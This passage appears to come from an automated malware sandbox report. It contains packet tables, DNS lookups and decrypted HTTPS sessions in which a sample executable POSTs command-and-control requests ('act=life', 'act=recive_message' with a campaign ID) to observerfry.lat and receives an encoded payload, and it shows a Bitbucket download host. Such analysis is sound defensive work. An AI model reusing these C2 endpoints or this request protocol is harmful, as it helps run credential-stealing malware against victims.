Dec 23, 2024 17:30:30.088469028 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.089281082 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.089297056 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.089359999 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.089369059 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.089396000 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.089449883 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.090213060 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.090233088 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.090296030 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.090306997 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.090317965 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.091981888 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.092003107 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.092084885 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.092086077 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.092094898 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.098670006 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.098710060 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.098771095 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.098803043 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.098803043 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.098812103 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.099083900 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.100397110 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.105200052 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.105226040 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.105319023 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.105328083 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.105345964 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.105417013 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.106046915 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.112169981 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.112196922 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.112386942 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.112386942 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.112400055 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.166479111 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.198201895 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.198229074 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.198271036 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.198303938 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.198327065 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.198858023 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.204843998 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.204868078 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.204898119 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.204901934 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.204926014 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.204952002 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.204952002 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.213885069 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.213932991 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.213959932 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.213989973 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.214020014 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.214579105 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.214579105 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.219193935 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.219216108 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.219324112 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.219372034 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.219372034 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.219396114 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.225087881 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.225137949 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.225430965 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.225430965 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.225442886 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.232194901 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.232213974 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.232275009 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.232297897 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.239103079 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.239145994 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.239172935 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.239208937 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.239209890 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.239226103 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.239388943 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.245414019 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.245466948 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.245491982 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.245565891 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.245565891 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.245574951 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.251851082 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.251872063 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.251910925 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.251919985 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.252760887 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.252806902 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.252806902 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.252825975 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.252840042 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:30.253747940 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.590971947 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:30.639895916 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:31.342737913 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:31.342787027 CET	443	49745	3.5.27.149	192.168.2.4
Dec 23, 2024 17:30:31.342823029 CET	49745	443	192.168.2.4	3.5.27.149
Dec 23, 2024 17:30:31.342829943 CET	443	49745	3.5.27.149	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2024 17:29:59.533122063 CET	60363	53	192.168.2.4	1.1.1.1
Dec 23, 2024 17:29:59.670579910 CET	53	60363	1.1.1.1	192.168.2.4
Dec 23, 2024 17:30:23.080112934 CET	51975	53	192.168.2.4	1.1.1.1
Dec 23, 2024 17:30:23.310477018 CET	53	51975	1.1.1.1	192.168.2.4
Dec 23, 2024 17:30:25.626722097 CET	55071	53	192.168.2.4	1.1.1.1
Dec 23, 2024 17:30:25.920959949 CET	53	55071	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 23, 2024 17:29:59.533122063 CET	192.168.2.4	1.1.1.1	0x6a74	Standard query (0)	observerfry.lat	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:30:23.080112934 CET	192.168.2.4	1.1.1.1	0x5ec9	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:30:25.626722097 CET	192.168.2.4	1.1.1.1	0xda62	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 23, 2024 17:29:59.670579910 CET	1.1.1.1	192.168.2.4	0x6a74	No error (0)	observerfry.lat		172.67.199.72	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:29:59.670579910 CET	1.1.1.1	192.168.2.4	0x6a74	No error (0)	observerfry.lat		104.21.36.201	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:30:23.310477018 CET	1.1.1.1	192.168.2.4	0x5ec9	No error (0)	bitbucket.org		185.166.143.50	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:30:23.310477018 CET	1.1.1.1	192.168.2.4	0x5ec9	No error (0)	bitbucket.org		185.166.143.49	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:30:23.310477018 CET	1.1.1.1	192.168.2.4	0x5ec9	No error (0)	bitbucket.org		185.166.143.48	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:30:25.920959949 CET	1.1.1.1	192.168.2.4	0xda62	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 23, 2024 17:30:25.920959949 CET	1.1.1.1	192.168.2.4	0xda62	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 23, 2024 17:30:25.920959949 CET	1.1.1.1	192.168.2.4	0xda62	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.27.149	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:30:25.920959949 CET	1.1.1.1	192.168.2.4	0xda62	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.25.57	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:30:25.920959949 CET	1.1.1.1	192.168.2.4	0xda62	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.30.95	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:30:25.920959949 CET	1.1.1.1	192.168.2.4	0xda62	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.206.17	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:30:25.920959949 CET	1.1.1.1	192.168.2.4	0xda62	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.28.182	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:30:25.920959949 CET	1.1.1.1	192.168.2.4	0xda62	No error (0)	s3-w.us-east-1.amazonaws.com		16.15.194.192	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:30:25.920959949 CET	1.1.1.1	192.168.2.4	0xda62	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.194.129	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:30:25.920959949 CET	1.1.1.1	192.168.2.4	0xda62	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.29.63	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

observerfry.lat

bitbucket.org

bbuseruploads.s3.amazonaws.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	172.67.199.72	443	7008	C:\Users\user\Desktop\NAnOVCOt4L.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 16:30:00 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: observerfry.lat
2024-12-23 16:30:00 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-23 16:30:01 UTC	1121	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 16:30:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fm0fu32pq1p9mhs57dboui0hhr; expires=Fri, 18 Apr 2025 10:16:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8yQKBBWc22dDPf1CwLS6NNBmTP%2Fw85NWm4IfHwtMaIf%2FVLA17CyyHfs8NLPKlf0AI5Vys47Tz4HKATBo7XTLzMFhBc7bhGk0O7pRvtmow84kr5V3WoywyiUY0txh4GpcOb4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f69bbd95bad421b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1694&min_rtt=1682&rtt_var=655&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1641371&cwnd=185&unsent_bytes=0&cid=4de04d6069f0beb1&ts=640&x=0"
2024-12-23 16:30:01 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-23 16:30:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	172.67.199.72	443	7008	C:\Users\user\Desktop\NAnOVCOt4L.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 16:30:03 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: observerfry.lat
2024-12-23 16:30:03 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-23 16:30:03 UTC	1133	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 16:30:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=i4hd513qgo8sgfkhjre7ag3qke; expires=Fri, 18 Apr 2025 10:16:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w3QCNzPGedH%2Bv8KZhgWVzRPfSRf%2FKpi7Bsdnoy%2FhW8apeDKmfWLGqELba8LZN8rR1mN6bu%2FAjWM08%2Fi8ORdN5nLJckgN1R5ohwu25MuCjTu32Ko1rLfe2sC%2FTzfC4%2BkAw5k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f69bbe6ff52de9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=74235&min_rtt=71003&rtt_var=33091&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=952&delivery_rate=30145&cwnd=209&unsent_bytes=0&cid=af99b1dd01cb4c62&ts=886&x=0"
2024-12-23 16:30:03 UTC	236	IN	Data Raw: 34 39 31 63 0d 0a 42 39 2b 63 6e 69 62 6b 2b 34 65 74 78 32 34 49 4a 49 63 56 38 49 62 32 59 4e 46 77 38 46 55 46 31 64 48 4b 6f 61 32 76 46 6b 35 38 2f 65 71 38 48 4e 44 58 70 64 36 69 54 44 4a 51 39 57 43 56 71 74 51 42 74 56 4c 4b 4d 32 53 35 6f 71 2b 4e 6a 39 6c 37 62 44 32 35 2f 66 4a 56 67 64 65 6c 79 4c 39 4d 4d 6e 2f 38 4e 35 58 6f 31 46 72 7a 46 5a 6f 33 5a 4c 6d 7a 71 38 72 43 33 33 6f 74 62 37 50 37 39 6b 4f 48 6e 2b 62 42 71 67 74 74 51 65 5a 2f 6e 75 2b 62 43 4c 78 53 33 48 64 67 72 2f 50 77 67 2b 44 4b 59 69 39 4b 76 75 2f 31 42 4a 6e 58 2f 49 2b 69 41 43 6f 65 70 58 53 56 35 4a 6f 47 74 52 75 59 50 57 32 78 73 71 37 4c 33 63 5a 77 4a 6d 2b 39 2b 50 64 4a 6a 6f 76 72 79 36 30 41 61 30 Data Ascii: 491cB9+cnibk+4etx24IJIcV8Ib2YNFw8FUF1dHKoa2vFk58/eq8HNDXpd6iTDJQ9WCVqtQBtVLKM2S5oq+Nj9l7bD25/fJVgdelyL9MMn/8N5Xo1FrzFZo3ZLmzq8rC33otb7P79kOHn+bBqgttQeZ/nu+bCLxS3Hdgr/Pwg+DKYi9Kvu/1BJnX/I+iACoepXSV5JoGtRuYPW2xsq7L3cZwJm+9+PdJjovry60Aa0
2024-12-23 16:30:03 UTC	1369	IN	Data Raw: 76 6d 4e 39 79 6b 6b 78 72 7a 53 74 4a 6b 56 62 53 69 75 64 62 43 33 58 4a 73 65 76 50 6e 76 45 4f 4b 32 62 32 50 72 51 42 6b 51 2b 5a 34 6c 65 57 55 45 4c 77 53 6b 54 39 76 73 37 6d 6e 7a 4d 44 44 66 69 74 74 74 50 6e 7a 51 34 36 66 36 73 7a 6c 51 69 70 42 2f 54 66 4b 70 4c 51 53 73 42 47 47 4f 6e 62 33 72 4f 62 61 6a 38 70 34 62 44 33 39 2b 50 4a 46 69 35 6e 33 78 36 34 48 62 31 54 75 66 70 2f 70 6c 41 2b 35 48 5a 45 33 59 4c 32 35 70 38 6e 4c 77 48 6b 71 5a 62 32 2b 73 67 53 42 67 61 57 58 35 53 39 76 56 75 4a 37 68 4b 61 75 51 71 78 63 69 33 64 67 75 2f 50 77 67 38 66 49 64 79 39 75 73 76 33 30 54 35 53 5a 39 38 6d 6f 43 58 68 41 34 48 6d 59 35 34 59 49 76 52 53 52 50 6d 79 2b 74 71 2f 48 6a 34 4d 30 4b 33 33 39 70 72 78 6c 69 35 4c 70 78 62 49 4d 4b Data Ascii: vmN9ykkxrzStJkVbSiudbC3XJsevPnvEOK2b2PrQBkQ+Z4leWUELwSkT9vs7mnzMDDfitttPnzQ46f6szlQipB/TfKpLQSsBGGOnb3rObaj8p4bD39+PJFi5n3x64Hb1Tufp/plA+5HZE3YL25p8nLwHkqZb2+sgSBgaWX5S9vVuJ7hKauQqxci3dgu/Pwg8fIdy9usv30T5SZ98moCXhA4HmY54YIvRSRPmy+tq/Hj4M0K339prxli5LpxbIMK
2024-12-23 16:30:03 UTC	1369	IN	Data Raw: 53 36 49 59 4f 75 52 53 64 4f 6d 76 33 2f 65 6a 45 31 34 30 73 62 45 2b 2b 36 76 39 4f 78 4b 7a 6d 77 61 73 4c 66 41 62 36 4f 59 75 6b 6b 77 37 7a 53 74 49 36 5a 72 2b 31 75 73 7a 43 7a 6e 6f 69 61 72 6a 78 39 45 53 47 6c 4f 44 4c 72 67 64 70 53 2b 46 6c 6d 4f 53 63 42 37 49 59 6d 48 63 70 39 37 53 77 67 35 65 4e 52 54 74 75 2f 38 76 2f 53 6f 69 65 38 34 2b 36 51 6e 4d 47 34 6e 76 53 76 4e 51 50 75 78 65 58 4f 47 61 39 76 61 33 4a 77 38 56 36 4c 33 65 79 2b 76 78 49 6a 70 50 6f 77 61 45 45 59 30 33 75 63 5a 4c 6c 6e 6b 4c 39 55 70 55 76 4a 2b 2f 7a 6e 4d 54 44 77 48 74 75 55 4c 37 77 38 6b 4f 51 32 66 71 42 76 45 78 74 53 71 55 76 30 75 69 64 41 72 67 59 6c 6a 64 67 75 72 61 72 78 4d 7a 41 63 79 5a 72 75 76 72 77 54 59 75 66 35 63 69 68 43 58 68 44 37 48 Data Ascii: S6IYOuRSdOmv3/ejE140sbE++6v9OxKzmwasLfAb6OYukkw7zStI6Zr+1uszCznoiarjx9ESGlODLrgdpS+FlmOScB7IYmHcp97Swg5eNRTtu/8v/Soie84+6QnMG4nvSvNQPuxeXOGa9va3Jw8V6L3ey+vxIjpPowaEEY03ucZLlnkL9UpUvJ+/znMTDwHtuUL7w8kOQ2fqBvExtSqUv0uidArgYljdgurarxMzAcyZruvrwTYuf5cihCXhD7H
2024-12-23 16:30:03 UTC	1369	IN	Data Raw: 44 4b 56 53 6a 58 6c 2b 39 37 53 6b 67 35 65 4e 66 53 56 33 73 2f 44 31 53 59 43 52 34 73 47 6f 42 32 78 4e 34 6e 43 55 36 5a 77 50 74 68 47 54 4d 32 32 6c 73 4b 50 4a 77 73 63 30 59 69 57 36 35 72 77 63 78 72 37 70 35 72 55 58 65 46 43 6c 61 4e 7a 39 31 41 57 2f 55 73 70 33 5a 4c 69 36 70 38 76 48 77 6e 73 6f 61 37 76 34 38 55 47 4a 6b 2f 66 48 71 77 46 68 53 65 35 6c 6b 75 6d 51 44 72 63 61 6d 54 30 6e 2b 66 4f 76 32 34 2b 56 4e 42 6c 6f 73 76 37 2f 55 73 61 47 71 39 62 6c 43 32 59 47 76 54 65 65 36 70 51 4e 76 78 36 5a 50 32 61 37 76 61 2f 47 78 73 56 38 50 6d 53 35 39 76 31 4b 69 5a 6a 68 79 71 41 49 62 55 4c 6a 65 4e 4b 71 31 41 57 72 55 73 70 33 53 4a 43 47 36 75 4c 31 6a 57 74 69 66 50 33 35 38 41 54 65 32 65 6e 4d 71 51 52 6c 51 4f 78 37 6d 4f 32 Data Ascii: DKVSjXl+97Skg5eNfSV3s/D1SYCR4sGoB2xN4nCU6ZwPthGTM22lsKPJwsc0YiW65rwcxr7p5rUXeFClaNz91AW/Usp3ZLi6p8vHwnsoa7v48UGJk/fHqwFhSe5lkumQDrcamT0n+fOv24+VNBlosv7/UsaGq9blC2YGvTee6pQNvx6ZP2a7va/GxsV8PmS59v1KiZjhyqAIbULjeNKq1AWrUsp3SJCG6uL1jWtifP358ATe2enMqQRlQOx7mO2
2024-12-23 16:30:03 UTC	1369	IN	Data Raw: 5a 59 30 59 37 4b 38 71 63 4c 4a 33 33 4d 6c 64 37 50 7a 38 30 79 4f 6b 4f 54 4c 6f 41 46 73 53 75 39 32 6c 65 71 61 43 76 4e 63 30 6a 42 2f 39 2b 76 6f 34 74 2f 57 5a 6a 70 6f 6e 50 50 7a 42 4a 6e 58 2f 49 2b 69 41 43 6f 65 70 58 36 41 34 4a 6b 51 75 68 57 63 4f 47 53 6c 73 71 58 49 33 63 70 37 4b 47 4b 78 2b 50 4e 43 68 35 7a 76 77 36 49 4a 59 55 6e 70 4e 39 79 6b 6b 78 72 7a 53 74 49 5a 62 4b 53 6b 71 38 33 45 32 32 39 73 65 76 50 6e 76 45 4f 4b 32 62 32 50 70 67 64 68 51 75 56 37 6b 75 43 5a 41 71 45 64 6c 54 42 75 76 4b 47 69 78 4d 6a 47 66 43 64 71 75 2b 7a 77 53 70 53 63 39 39 33 6c 51 69 70 42 2f 54 66 4b 70 4b 49 46 6f 77 4b 52 64 56 61 68 73 4c 37 49 77 73 45 30 4d 79 75 6b 76 76 74 49 78 73 47 6c 79 61 6f 46 61 55 6e 6b 66 70 37 70 6b 51 75 32 Data Ascii: ZY0Y7K8qcLJ33Mld7Pz80yOkOTLoAFsSu92leqaCvNc0jB/9+vo4t/WZjponPPzBJnX/I+iACoepX6A4JkQuhWcOGSlsqXI3cp7KGKx+PNCh5zvw6IJYUnpN9ykkxrzStIZbKSkq83E229sevPnvEOK2b2PpgdhQuV7kuCZAqEdlTBuvKGixMjGfCdqu+zwSpSc993lQipB/TfKpKIFowKRdVahsL7IwsE0MyukvvtIxsGlyaoFaUnkfp7pkQu2
2024-12-23 16:30:03 UTC	1369	IN	Data Raw: 79 35 67 61 76 59 6a 39 49 36 4e 53 57 36 38 72 77 63 78 70 72 69 7a 4b 51 47 59 30 72 71 63 4a 62 32 6e 67 57 68 45 35 4d 38 61 72 75 7a 70 63 37 46 7a 48 30 68 61 62 44 35 2b 30 75 44 32 61 75 50 6f 68 51 71 48 71 56 57 6e 2b 2b 59 57 65 6c 53 6a 58 6c 2b 39 37 53 6b 67 35 65 4e 64 43 5a 67 74 2f 50 2f 53 34 57 4c 35 4d 6d 33 44 47 64 4d 39 33 32 5a 34 5a 6b 50 76 68 47 55 4d 57 79 37 6f 61 48 44 7a 4d 59 30 59 69 57 36 35 72 77 63 78 72 72 79 32 61 38 4c 5a 6c 44 75 64 70 48 79 6d 52 4c 7a 58 4e 49 6d 59 4b 62 7a 38 4e 58 66 32 6e 4d 7a 4b 36 53 2b 2b 30 6a 47 77 61 58 4a 72 41 70 74 51 4f 74 6c 6c 2b 4b 62 44 62 6f 62 6c 6a 39 6b 74 37 65 73 78 4d 72 4f 65 43 64 69 76 76 48 34 54 59 69 51 36 6f 2f 72 54 47 31 65 70 53 2f 53 78 59 38 42 76 78 2f 53 4b Data Ascii: y5gavYj9I6NSW68rwcxprizKQGY0rqcJb2ngWhE5M8aruzpc7FzH0habD5+0uD2auPohQqHqVWn++YWelSjXl+97Skg5eNdCZgt/P/S4WL5Mm3DGdM932Z4ZkPvhGUMWy7oaHDzMY0YiW65rwcxrry2a8LZlDudpHymRLzXNImYKbz8NXf2nMzK6S++0jGwaXJrAptQOtll+KbDboblj9kt7esxMrOeCdivvH4TYiQ6o/rTG1epS/SxY8Bvx/SK
2024-12-23 16:30:03 UTC	1369	IN	Data Raw: 6f 6a 59 2f 4b 62 47 77 39 2f 64 37 33 55 6f 4f 65 38 34 32 51 44 32 52 49 34 6d 48 53 2b 36 74 4d 38 78 32 49 64 7a 2b 4f 71 75 6a 45 77 34 30 73 62 48 43 36 2f 76 74 65 6b 4a 37 70 33 71 34 42 5a 6d 54 71 63 49 54 6e 6d 77 47 69 47 39 34 38 61 76 66 39 36 4d 54 58 6a 53 78 73 53 72 72 6f 2f 32 75 46 69 4f 79 50 36 30 78 74 55 4b 55 76 30 74 72 55 45 4c 41 43 6b 54 68 32 69 66 50 77 32 76 47 4e 66 7a 70 69 72 66 33 71 54 34 75 56 39 50 48 6c 56 44 34 55 74 79 58 41 74 6f 74 43 72 43 33 63 64 32 62 33 36 35 48 61 6a 39 73 30 64 44 66 7a 76 75 34 45 33 74 6d 69 7a 4c 63 65 62 45 58 7a 64 4e 58 61 71 69 57 6c 47 4a 55 6e 59 4b 43 38 36 49 32 50 77 6a 52 30 58 50 33 33 2b 31 2b 58 6a 2b 6a 66 6f 6b 78 56 43 4b 56 76 30 72 7a 55 4e 37 41 63 6e 44 42 78 70 76 Data Ascii: ojY/KbGw9/d73UoOe842QD2RI4mHS+6tM8x2Idz+OqujEw40sbHC6/vtekJ7p3q4BZmTqcITnmwGiG948avf96MTXjSxsSrro/2uFiOyP60xtUKUv0trUELACkTh2ifPw2vGNfzpirf3qT4uV9PHlVD4UtyXAtotCrC3cd2b365Haj9s0dDfzvu4E3tmizLcebEXzdNXaqiWlGJUnYKC86I2PwjR0XP33+1+Xj+jfokxVCKVv0rzUN7AcnDBxpv
